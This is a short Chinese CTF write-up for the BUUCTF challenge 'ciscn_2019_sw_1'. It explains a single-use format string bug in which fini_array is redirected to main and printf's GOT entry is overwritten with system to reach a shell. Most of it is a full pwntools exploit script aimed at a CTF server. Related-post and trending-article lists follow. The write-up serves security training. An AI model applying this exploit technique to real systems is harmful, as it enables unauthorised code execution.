ciscn_2019_sw_1

查看保护


这里有一个格式化漏洞,但是呢这里只能一次。这里学到了一个新姿势在程序结束的时候有一个fini.array段运行。这时将 fini.array[0]的地址改为main函数地址这样就可以运行两次了。这样的话改printf为system之后第二次传入bin/sh即可getshell。

from pwn import *context(arch='i386', os='linux', log_level='debug')file_name = './z1r0'debug = 1
if debug:r = remote('node4.buuoj.cn', 28242)
else:r = process(file_name)elf = ELF(file_name)def dbg():gdb.attach(r)system_plt = elf.plt['system']
printf_got = elf.got['printf']
main_addr = elf.sym['main']
print('system_plt = ', hex(system_plt))
print('printf_got = ', hex(printf_got))
fini_array = 0x804979cp = b'%2052c%13$hn%31692c%14$hn%356c%15$hn'
p += p32(printf_got + 2) + p32(printf_got) + p32(fini_array)r.recvline()
r.sendline(p)r.sendline('/bin/sh\x00')r.interactive()

ciscn_2019_sw_1相关推荐

  1. [BUUCTF-pwn]——ciscn_2019_sw_1

    [BUUCTF-pwn]--ciscn_2019_sw_1 一个简单的格式化字符串, 相信大家看到旁边 的system和格式化字符串漏洞,想的一定是利用格式化字符串漏洞将printf_got表修改sy ...

  2. [BUUCTF-pwn]——picoctf_2018_echo back

    [BUUCTF-pwn]--picoctf_2018_echo back 和之前的一道题及其类似大家可以对比一下[BUUCTF-pwn]--ciscn_2019_sw_1 思路都是一样的就是将prin ...

  3. BUUCTF-pwn(15)

    gyctf_2020_some_thing_interesting 经典UAF漏洞! Allocate申请函数! Free释放函数! 全保护开启,故我们利用格式化字符串漏洞泄露libc地址,从而得到m ...

最新文章

  1. 1月国内操作系统市场:Windows XP份额高达60.84%
  2. 青岛程序员加班看不上球赛崩溃,外卖小哥伸出援手:我帮你改代码
  3. startos 5.1 如何 root 登陆
  4. 今后最有前途的媒体格式 MXF
  5. 8.11 NOIP模拟测试17 入阵曲+将军令+星空
  6. 升级Linux(Ubtun/CentOS)的OpenSSL(openssl-1.0.1h.tar.gz)
  7. 数学分析(卓里奇)学习笔记001
  8. 固态硬盘在IDE、AHCI模式下的速度对比
  9. Mysql性能优化:什么是索引下推?
  10. VBS学习笔记(4): WScript //d //x MyScript.vbs,调试无法启动
  11. OpenCV——图像矩
  12. selenium 模拟登陆 古诗文网 含验证码
  13. Java基础--基础语法笔记(二)--Switch的用法
  14. Office多版本共存,设置打开的版本
  15. 掌握这10条精进原则,成为一名更好的软件开发者
  16. elk笔记13--Queries-compound queries
  17. 扭转战局的棋子 安卓4.4 ART模式实测解析
  18. 30天自制操作系统 综合设计
  19. 关于海外网红营销,我想给你提五点建议
  20. 汽车灯阻燃测试FMVSS302报告

热门文章

  1. 命令行启动mysql客户端_MySQL命令行客户端命令
  2. RDMA 架构与实践(技术详解(一):RDMA概述)
  3. lisp xy轴不等比缩放_【AutoCAD教程】CAD中如何进行X、Y两个轴向不等比缩放图形?...
  4. response.setHeader()的详细用法
  5. how to install chinses input method--fcitx in ubuntu
  6. 小米平板设备怎么无Root激活xposed框架的方法
  7. 【读书笔记】蒸汽朋克(各个艺术家的评论)
  8. 【MySQL知识点】自动增长
  9. 编程参考 - 编程中给变量起名时如何选择前缀,以及匈牙利命名法等
  10. 【远程调用返回400问题排查(已解决)】